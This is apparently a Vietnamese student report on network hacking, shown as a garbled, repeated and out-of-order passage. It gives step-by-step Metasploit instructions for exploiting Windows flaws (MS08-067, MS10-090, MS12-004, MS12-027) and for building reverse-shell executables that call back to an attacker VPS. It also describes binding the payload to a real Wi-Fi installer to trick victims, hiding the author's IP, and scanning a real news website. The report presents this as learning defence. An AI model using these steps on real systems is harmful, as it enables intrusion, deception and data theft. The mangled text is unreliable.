Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
